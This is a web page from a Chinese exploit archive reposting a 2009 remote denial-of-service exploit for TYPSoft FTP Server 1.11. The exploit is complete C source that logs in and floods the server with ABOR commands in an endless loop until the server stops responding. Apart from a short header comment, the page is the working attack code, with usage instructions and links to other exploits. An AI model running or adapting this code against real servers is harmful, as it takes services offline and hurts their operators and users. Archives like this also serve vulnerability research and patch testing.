首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 TYPSoft FTP Server 1.11 (ABORT) Remote DoS Exploit 来源：http://www.shell-storm.org 作者：Salwan 发布时间：2009-05-12   /* Soft   :  TYPSoft FTP Server Version:  1.11 Denial of Service in TYPSoft FTP Server up to 1.11 (no crash) Just the server is saturated, it stops responding. -------------------------------------------------------------------------------------- The vulnerability is caused due to an error in handling the request (ABOR). This can be exploited to satured the FTP service, and make the server inaccessible for several days. -------------------------------------------------------------------------------------- Author : Jonathan Salwan Mail : submit AT shell-storm.org Web : http://www.shell-storm.org */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int syntax(char *file) { fprintf(stderr,"TYPSoft FTP Server Remote Denial of Service\n"); fprintf(stderr,"=>Syntax : <%s> <ip> <port> <user> <pass>\n",file); fprintf(stderr,"         : %s 127.0.0.1 21 anonymous aaa\n",file); exit(0); } int main(int argc, char **argv) { if (argc < 2) syntax(argv[0]); int port = atoi(argv[2]); int mysocket; int mysocket2; int srv_connect; int sockaddr_long; struct sockaddr_in sockaddr_mysocket; sockaddr_long = sizeof(sockaddr_mysocket); sockaddr_mysocket.sin_family = AF_INET; sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]); sockaddr_mysocket.sin_port = htons(port);         char request[200]; char answer[500];         fprintf(stdout,"[+]TYPSoft FTP Server %s\n",argv[1]);                 mysocket2 = socket(AF_INET, SOCK_STREAM, 0);                         if(mysocket2 == -1){ return 1;} srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long); if (srv_connect != -1) { recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]Connexion\t\t[OK]\n"); sprintf(request, "USER %s\r\n", argv[3]); if (send(mysocket2,request,sizeof(request),0) == -1){ fprintf(stderr,"[-]Send Request User\t\t[FAILED]\n"); shutdown(mysocket2,1); return 1;} fprintf(stdout,"[+]USER request\t\t[OK]\n");                 sprintf(request, "PASS %s\r\n", argv[4]);                         if (send(mysocket2,request,sizeof(request),0) == -1){                                 fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");                                 shutdown(mysocket2,1);                                 return 1;} fprintf(stdout,"[+]PASS request\t\t[OK]\n");                 sprintf(request, "ABOR\r\n"); fprintf(stdout,"[+]If exploit is active, the server is saturated, it stops responding...\n"); while(1){                         if (send(mysocket2,request,sizeof(request),0) == -1){                                 fprintf(stderr,"[-]Send Request ABOR\t\t[FAILED]\n");                                 shutdown(mysocket2,1);                                 return 1;} } } else{ fprintf(stderr,"[-]Connect\t\t[FAILED]\n"); shutdown(mysocket2,1); return 1;} shutdown(mysocket2,1); return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·TinyWebGallery <= 1.7.6 LFI / ·Mereo 1.8.0 Arbitrary File Dis ·RTWebalbum 1.0.462 (AlbumID) B ·eggBlog <= 4.1.1 Local Directo ·Mortbay Jetty <= 7.0.0-pre5 Di ·microTopic v1 (rating) Remote ·Luxbum 0.5.5/stable (Auth Bypa ·MPLAB IDE 8.30 (.mcp) Universa ·ViPlay3 <= 3.00 (.vpl) Local S ·Personal FTP Server versions u ·Exploits BLIND SQL INJECTION ( ·TinyWebGallery <= 1.7.6 LFI /   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved